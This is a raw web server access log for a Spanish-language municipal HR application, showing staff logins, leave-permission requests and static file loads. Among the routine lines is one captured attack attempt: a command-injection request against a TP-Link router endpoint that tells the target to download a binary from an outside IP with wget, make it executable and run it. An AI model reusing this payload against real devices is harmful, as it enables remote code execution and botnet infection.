190.171.143.82 - - [15/May/2024:11:30:18 -0300] "GET /cormun/servlet/apermisogoceprn?10411509,P,20240515102720,PU HTTP/1.1" 200 1652
190.171.143.82 - - [15/May/2024:11:30:59 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7153
190.171.143.82 - - [15/May/2024:11:31:07 -0300] "GET /cormun/servlet/permisogoce?a3f389ea9d8bd8953468e507b016b51af22cde42b8b2622bf986261e692a3801c6fd0dd0cefbb0291c1867427c9d54bcd2583292ce68156c9012daefb37ae668,gx-no-cache=1715783326197 HTTP/1.1" 200 83
190.171.143.82 - - [15/May/2024:11:31:20 -0300] "GET /cormun/servlet/permisogoce?a3f389ea9d8bd8953468e507b016b51a918d970dec8b433408e45eaa61fb75a08cedca082277e45d936aa2e30541a52ecf1ed5e79e2558b4501825f5f527aad7,gx-no-cache=1715783339835 HTTP/1.1" 200 47
190.171.143.82 - - [15/May/2024:11:31:23 -0300] "POST /cormun/servlet/permisogoce?d93c1054a7616eb8ff7c6a20f7e538e4,INS,0,,,,gx-no-cache=1715783342374 HTTP/1.1" 200 93
190.171.143.82 - - [15/May/2024:11:31:23 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1013
190.171.143.82 - - [15/May/2024:11:31:24 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15680
190.171.143.82 - - [15/May/2024:11:31:28 -0300] "GET /cormun/servlet/apermisogoceprn?15126226,P,20240515102834,PU HTTP/1.1" 200 1658
190.171.143.82 - - [15/May/2024:11:31:43 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7153
190.171.143.82 - - [15/May/2024:11:31:50 -0300] "GET /cormun/servlet/permisogoce?a3f389ea9d8bd8953468e507b016b51acd8eceef1a12e62ad4a74008b1a3a8d7c6fd0dd0cefbb0291c1867427c9d54bcd2583292ce68156c9012daefb37ae668,gx-no-cache=1715783369317 HTTP/1.1" 200 78
190.171.143.82 - - [15/May/2024:11:31:55 -0300] "GET /cormun/servlet/permisogoce?a3f389ea9d8bd8953468e507b016b51a0f8ad1b83e66016e443da12c3c6152f15806d1766c55fc464b1198242c8ef2b3cf1ed5e79e2558b4501825f5f527aad7,gx-no-cache=1715783374513 HTTP/1.1" 200 48
190.171.143.82 - - [15/May/2024:11:31:58 -0300] "POST /cormun/servlet/permisogoce?d93c1054a7616eb8ff7c6a20f7e538e4,INS,0,,,,gx-no-cache=1715783377051 HTTP/1.1" 200 93
190.171.143.82 - - [15/May/2024:11:31:58 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1013
190.171.143.82 - - [15/May/2024:11:31:58 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15838
190.171.143.82 - - [15/May/2024:11:32:10 -0300] "GET /cormun/servlet/apermisogoceprn?13720292,P,20240515102918,PU HTTP/1.1" 200 1646
200.54.103.162 - - [15/May/2024:11:33:40 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3321
200.54.103.162 - - [15/May/2024:11:33:40 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
200.54.103.162 - - [15/May/2024:11:33:43 -0300] "POST /cormun/servlet/hlogin?52d60dc7ebd98a54900f943179e237c4,gx-no-cache=1715783482492 HTTP/1.1" 200 90
200.54.103.162 - - [15/May/2024:11:33:43 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
200.54.103.162 - - [15/May/2024:11:33:43 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4341
200.54.103.162 - - [15/May/2024:11:33:47 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13303
179.43.188.110 - - [15/May/2024:11:35:17 -0300] "GET / HTTP/1.1" 200 11217
190.171.149.82 - - [15/May/2024:11:35:55 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1720
190.171.149.82 - - [15/May/2024:11:35:59 -0300] "POST /cormun/servlet/hlogin?452d36dbe7ec077f6eb2f3ff14e34d92,gx-no-cache=1715783617787 HTTP/1.1" 200 90
190.171.149.82 - - [15/May/2024:11:35:59 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
190.171.149.82 - - [15/May/2024:11:36:00 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3929
190.171.149.82 - - [15/May/2024:11:36:05 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10376
190.171.142.50 - - [15/May/2024:11:36:51 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6046
190.171.142.50 - - [15/May/2024:11:36:51 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1736
190.171.149.82 - - [15/May/2024:11:36:56 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10375
190.171.142.50 - - [15/May/2024:11:37:00 -0300] "POST /cormun/servlet/hlogin?2bfd5b9794065a1cabcafa7ef8a95a88,gx-no-cache=1715783679513 HTTP/1.1" 200 90
190.171.142.50 - - [15/May/2024:11:37:00 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
190.171.142.50 - - [15/May/2024:11:37:00 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 12451
190.171.149.82 - - [15/May/2024:11:37:02 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6794
190.171.149.82 - - [15/May/2024:11:37:22 -0300] "GET /cormun/servlet/permisogoce?efe6613f0ef1a1ef6c9e3622cdc5985a6e5bccded29d986c06e1b7cc329a10a64b53103405d22aa1c3486881747ca290652c447c5307ae65d717c6751199bfec,gx-no-cache=1715783700470 HTTP/1.1" 200 80
190.171.149.82 - - [15/May/2024:11:37:30 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.82 - - [15/May/2024:11:37:38 -0300] "GET /cormun/servlet/permisogoce?efe6613f0ef1a1ef6c9e3622cdc5985a5911aa309a717bb7302d38498694e983b0897d4a0f39c0da7e9674d708d4499426e36b38bdcd046838beda7001a49874,gx-no-cache=1715783716610 HTTP/1.1" 200 47
190.171.149.82 - - [15/May/2024:11:37:47 -0300] "POST /cormun/servlet/permisogoce?452d36dbe7ec077f6eb2f3ff14e34d92,INS,0,,,,gx-no-cache=1715783724900 HTTP/1.1" 200 93
190.171.149.82 - - [15/May/2024:11:37:47 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1011
190.171.149.82 - - [15/May/2024:11:37:47 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10659
190.171.149.82 - - [15/May/2024:11:38:02 -0300] "GET /cormun/servlet/apermisogoceprn?20214951,P,20240515103436,PU HTTP/1.1" 200 1653
190.171.149.82 - - [15/May/2024:11:38:03 -0300] "GET /cormun/servlet/apermisogoceprn?20214951,P,20240515103436,PU HTTP/1.1" 200 1658
190.171.142.50 - - [15/May/2024:11:38:04 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7183
190.171.142.50 - - [15/May/2024:11:38:04 -0300] "GET /cormun/static/gxcfg.js?20221129846531 HTTP/1.1" 200 953
190.171.142.50 - - [15/May/2024:11:38:04 -0300] "GET /cormun/static/trsolicitudot.js?202211298465651 HTTP/1.1" 200 54040
190.171.142.50 - - [15/May/2024:11:38:07 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15962
190.171.142.50 - - [15/May/2024:11:38:07 -0300] "GET /cormun/static/gxcfg.js?20221129840861 HTTP/1.1" 200 953
190.171.142.50 - - [15/May/2024:11:38:07 -0300] "GET /cormun/static/solicitudot.js?20221129840983 HTTP/1.1" 200 74072
190.171.149.82 - - [15/May/2024:11:38:18 -0300] "GET /cormun/servlet/apermisogoceprn?20214951,P,20240515103436,PU HTTP/1.1" 200 1658
190.171.149.82 - - [15/May/2024:11:38:19 -0300] "GET /cormun/servlet/apermisogoceprn?20214951,P,20240515103436,PU HTTP/1.1" 200 1657
190.171.142.50 - - [15/May/2024:11:38:46 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1715783786024 HTTP/1.1" 200 4031
190.171.142.50 - - [15/May/2024:11:38:47 -0300] "POST /cormun/servlet/solicitudot?2bfd5b9794065a1cabcafa7ef8a95a88,INS,0,0,false,,gx-no-cache=1715783786178 HTTP/1.1" 200 12605
190.171.142.50 - - [15/May/2024:11:38:51 -0300] "GET /cormun/servlet/solicitudot?42422adc04061f6742f01df97c1118dc568a2a940e63d49a79a20cf8df1491a6be35cb21d3955ed9d1ef4843c289eb63,gx-no-cache=1715783791206 HTTP/1.1" 200 30
141.255.167.250 - - [15/May/2024:11:38:58 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 1013
190.171.149.82 - - [15/May/2024:11:39:14 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6794
190.171.149.74 - - [15/May/2024:11:39:21 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6054
190.171.149.74 - - [15/May/2024:11:39:21 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1740
190.171.149.74 - - [15/May/2024:11:39:32 -0300] "POST /cormun/servlet/hlogin?77fc501935aa0a2a3f9a3964d7987819,gx-no-cache=1715783829030 HTTP/1.1" 200 90
190.171.149.74 - - [15/May/2024:11:39:32 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 958
190.171.149.74 - - [15/May/2024:11:39:32 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13734
190.171.149.82 - - [15/May/2024:11:39:35 -0300] "GET /cormun/servlet/permisogoce?efe6613f0ef1a1ef6c9e3622cdc5985a10a93ce95fa8e585e19f79b3573bb2104b53103405d22aa1c3486881747ca290652c447c5307ae65d717c6751199bfec,gx-no-cache=1715783833908 HTTP/1.1" 200 79
190.171.149.82 - - [15/May/2024:11:39:43 -0300] "GET /cormun/servlet/permisogoce?efe6613f0ef1a1ef6c9e3622cdc5985af512ce665df1cef329233f579d23039693a6ac156fc53d758c6d5efedd1821b926e36b38bdcd046838beda7001a49874,gx-no-cache=1715783841933 HTTP/1.1" 200 47
190.171.149.82 - - [15/May/2024:11:39:49 -0300] "POST /cormun/servlet/permisogoce?452d36dbe7ec077f6eb2f3ff14e34d92,INS,0,,,,gx-no-cache=1715783847020 HTTP/1.1" 200 93
190.171.149.82 - - [15/May/2024:11:39:49 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1011
190.171.149.82 - - [15/May/2024:11:39:49 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10883
190.171.149.82 - - [15/May/2024:11:39:57 -0300] "GET /cormun/servlet/apermisogoceprn?15104576,P,20240515103649,PU HTTP/1.1" 200 1654
190.171.149.82 - - [15/May/2024:11:39:58 -0300] "GET /cormun/servlet/apermisogoceprn?15104576,P,20240515103649,PU HTTP/1.1" 200 1656
190.171.149.82 - - [15/May/2024:11:40:42 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 8329
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1715
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
190.171.141.122 - - [15/May/2024:11:41:02 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
190.171.141.122 - - [15/May/2024:11:41:05 -0300] "POST /cormun/servlet/hlogin?b0c4a2a6abb51a0b8e5db0c10b48db43,gx-no-cache=1715783923305 HTTP/1.1" 200 90
190.171.141.122 - - [15/May/2024:11:41:05 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 946
190.171.141.122 - - [15/May/2024:11:41:05 -0300] "GET /cormun/static/gxcfg.js?20221129847421 HTTP/1.1" 200 953
190.171.141.122 - - [15/May/2024:11:41:05 -0300] "GET /cormun/static/hpexe_link.js?20221129847423 HTTP/1.1" 200 625
190.171.141.122 - - [15/May/2024:11:41:05 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?8354383 HTTP/1.1" 200 100853
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3904
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.css?1345370 HTTP/1.1" 200 30288
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu.css?1112540 HTTP/1.1" 200 2223
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu-v.css?1112540 HTTP/1.1" 200 1188
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/scaMessage/css/jquery.pnotify.default.css?1816380 HTTP/1.1" 200 1707
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/gxcfg.js?20201215495537 HTTP/1.1" 200 953
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_autoreload.js HTTP/1.1" 200 1762
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?14345360 HTTP/1.1" 200 100853
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_cookies.js HTTP/1.1" 200 792
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_grid.js HTTP/1.1" 200 7559
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_link.js HTTP/1.1" 200 5671
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_menudivfix.js HTTP/1.1" 200 333
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_griddivfix.js HTTP/1.1" 200 6946
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_windows.js HTTP/1.1" 200 15249
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_menus.js HTTP/1.1" 200 1286
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_oav.js HTTP/1.1" 200 645
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_oavdivfix.js HTTP/1.1" 200 639
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_picture.js HTTP/1.1" 200 689
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_popup.js HTTP/1.1" 200 15149
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_layers.js HTTP/1.1" 200 4114
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_scrolldiv.js HTTP/1.1" 200 4138
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_tabdivfix.js HTTP/1.1" 200 898
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_tabs.js HTTP/1.1" 200 3748
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_upload.js HTTP/1.1" 200 1423
190.171.141.122 - - [15/May/2024:11:41:06 -0300] "GET /cormun/static/PXToolsJavascripts/PXToolsJavascriptsRender.js HTTP/1.1" 200 367
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Resources/CormunMP2.png HTTP/1.1" 200 6878
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Resources/ImgHome.png HTTP/1.1" 200 1364
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Resources/ImgLogin.png HTTP/1.1" 200 1432
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Resources/Llave.png HTTP/1.1" 200 1395
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/RunJS/RunJS.js HTTP/1.1" 200 288
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Resources/PXToolsDataTitle.png HTTP/1.1" 200 1173
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Shared/ext/locale/ext-lang-en.js HTTP/1.1" 200 10940
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hhome.js?20201215495544 HTTP/1.1" 200 777
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hwchdr01.js?2022112219251119 HTTP/1.1" 200 996
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hpexe_recentlink.js?20201214471090 HTTP/1.1" 200 2144
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hpexe_scripts.js?20201214471411 HTTP/1.1" 200 1544
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hpexe_messagecontroller.js?202211298371222 HTTP/1.1" 200 870
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hpexe_messagepopupcomponent.js?2020121447232 HTTP/1.1" 200 605
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hpexe_messagegenexuscomponent.js?20221129836373 HTTP/1.1" 200 587
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/cmcontrolpreferences.js?20199141926336 HTTP/1.1" 200 1375
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/gxui/gxui-all.js HTTP/1.1" 200 107772
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Shared/jquery/jquery-1.4.2.min.js HTTP/1.1" 200 72174
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu.js HTTP/1.1" 200 12712
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.js HTTP/1.1" 200 240427
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/SmoothNavMenu/resources/SmoothNavMenuRender.js HTTP/1.1" 200 5951
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Shared/jquery/jquery-1.10.2.min.js HTTP/1.1" 200 273199
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/scaMessage/js/jquery.pnotify.min.js HTTP/1.1" 200 13038
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/scaMessage/scaMessageRender.js HTTP/1.1" 200 11977
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/hmpwkw03.js?20221129844354 HTTP/1.1" 200 3971
190.171.141.122 - - [15/May/2024:11:41:07 -0300] "GET /cormun/static/Shared/ext/ext-all.js HTTP/1.1" 200 1289687
190.171.141.122 - - [15/May/2024:11:41:08 -0300] "GET /cormun/static/SmoothNavMenu/resources/images/down.gif HTTP/1.1" 200 854
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9829
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/gxui/gxui-all.css?120300 HTTP/1.1" 200 2179
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/gxcfg.js?202211298463625 HTTP/1.1" 200 953
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/calendar-system.css?85620 HTTP/1.1" 200 5572
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/calendar.js?85251 HTTP/1.1" 200 26246
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/calendar-setup.js?85251 HTTP/1.1" 200 2588
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/calendar-es.js?85251 HTTP/1.1" 200 1901
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/Resources/PXTools/calendar.png HTTP/1.1" 200 1306
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/gxdec.js?85251 HTTP/1.1" 200 19579
190.171.141.122 - - [15/May/2024:11:41:12 -0300] "GET /cormun/static/trlicencias.js?202211298463889 HTTP/1.1" 200 41883
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?215870 HTTP/1.1" 200 416045
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsDataSearch.png HTTP/1.1" 200 435
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsGridFirstDisabled.gif HTTP/1.1" 200 100
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsGridPreviousDisabled.gif HTTP/1.1" 200 90
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsGridNextDisabled.gif HTTP/1.1" 200 90
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsGridLastDisabled.gif HTTP/1.1" 200 98
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsGridPage.gif HTTP/1.1" 200 725
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsActionExcel.png HTTP/1.1" 200 727
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/PXToolsAddAllAction.png HTTP/1.1" 200 495
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/desc.gif HTTP/1.1" 200 65
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun//static/Resources/PXToolsActionDisabled.gif HTTP/1.1" 200 53
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun//static/Resources/PXTools/ActionInsert.png HTTP/1.1" 200 1482
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun//static/Resources/PXToolsActionPrint.png HTTP/1.1" 200 404
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Resources/asc.gif HTTP/1.1" 200 67
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun//static/Resources/PXToolsGridDisplay.png HTTP/1.1" 200 525
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun//static/Resources/PXToolsHeaderFavorites.png HTTP/1.1" 200 1414
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun//static/Resources/PXToolsHeaderHelp.png HTTP/1.1" 200 1333
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/tools/tool-sprites.gif HTTP/1.1" 200 5434
190.171.141.122 - - [15/May/2024:11:41:13 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/panel/bg-headersPanel.png HTTP/1.1" 200 255
190.171.141.122 - - [15/May/2024:11:41:19 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3904
190.171.149.82 - - [15/May/2024:11:45:04 -0300] "GET /cormun/servlet/trfichaempleado? HTTP/1.1" 200 8882
190.171.143.82 - - [15/May/2024:11:45:20 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11358
190.171.149.82 - - [15/May/2024:11:46:03 -0300] "GET /cormun/servlet/trfichaempleado? HTTP/1.1" 200 8882
190.171.152.234 - - [15/May/2024:11:46:27 -0300] "POST /cormun/servlet/hlogin?cfdf71bb488398d7dd9bc9f23f7aee68,gx-no-cache=1715780637089 HTTP/1.1" 200 90
190.171.152.234 - - [15/May/2024:11:46:27 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.152.234 - - [15/May/2024:11:46:27 -0300] "GET /cormun/static/gxcfg.js?20221129847421 HTTP/1.1" 200 953
190.171.152.234 - - [15/May/2024:11:46:27 -0300] "GET /cormun/static/hpexe_link.js?20221129847423 HTTP/1.1" 200 625
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 9834
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun//static/Resources/PXToolsActionDisabled.gif HTTP/1.1" 200 53
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun//static/Resources/PXToolsGridDisplay.png HTTP/1.1" 200 525
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun//static/Resources/PXTools/ActionInsert.png HTTP/1.1" 200 1482
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun//static/Resources/PXToolsActionPrint.png HTTP/1.1" 200 404
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun//static/Resources/PXToolsHeaderHelp.png HTTP/1.1" 200 1333
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun//static/Resources/PXToolsHeaderFavorites.png HTTP/1.1" 200 1414
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun/static/SmoothNavMenu/resources/images/down.gif HTTP/1.1" 200 854
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/panel/bg-headersPanel.png HTTP/1.1" 200 255
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/tools/tool-sprites.gif HTTP/1.1" 200 5434
190.171.152.234 - - [15/May/2024:11:46:28 -0300] "GET /cormun/static/SmoothNavMenu/resources/images/right.gif HTTP/1.1" 200 860
190.171.152.234 - - [15/May/2024:11:47:46 -0300] "GET /cormun/servlet/trcontratosolicitud? HTTP/1.1" 200 14509
190.171.152.234 - - [15/May/2024:11:47:46 -0300] "GET /cormun/static/gxcfg.js?202211298514361 HTTP/1.1" 200 953
190.171.152.234 - - [15/May/2024:11:47:46 -0300] "GET /cormun/static/trcontratosolicitud.js?202211298514531 HTTP/1.1" 200 28237
190.171.152.234 - - [15/May/2024:11:47:46 -0300] "GET /cormun//static/Resources/PXToolsGridNew.png HTTP/1.1" 200 427
190.171.152.234 - - [15/May/2024:11:47:52 -0300] "POST /cormun/servlet/trcontratosolicitud?cfdf71bb488398d7dd9bc9f23f7aee68,,gx-no-cache=1715780721493 HTTP/1.1" 200 12252
190.171.152.234 - - [15/May/2024:11:47:52 -0300] "GET /cormun/static/Resources/PXToolsGridLast.gif HTTP/1.1" 200 370
190.171.152.234 - - [15/May/2024:11:47:52 -0300] "GET /cormun/static/Resources/PXToolsGridNext.gif HTTP/1.1" 200 369
190.171.152.234 - - [15/May/2024:11:47:56 -0300] "POST /cormun/servlet/trcontratosolicitud?cfdf71bb488398d7dd9bc9f23f7aee68,,gx-no-cache=1715780725688 HTTP/1.1" 200 12420
190.171.152.234 - - [15/May/2024:11:47:56 -0300] "GET /cormun/static/Resources/PXToolsGridPrevious.gif HTTP/1.1" 200 369
190.171.152.234 - - [15/May/2024:11:47:56 -0300] "GET /cormun/static/Resources/PXToolsGridFirst.gif HTTP/1.1" 200 379
190.171.152.234 - - [15/May/2024:11:47:58 -0300] "POST /cormun/servlet/trcontratosolicitud?cfdf71bb488398d7dd9bc9f23f7aee68,,gx-no-cache=1715780728112 HTTP/1.1" 200 7995
190.171.152.234 - - [15/May/2024:11:48:03 -0300] "POST /cormun/servlet/trcontratosolicitud?cfdf71bb488398d7dd9bc9f23f7aee68,,gx-no-cache=1715780732967 HTTP/1.1" 200 12420
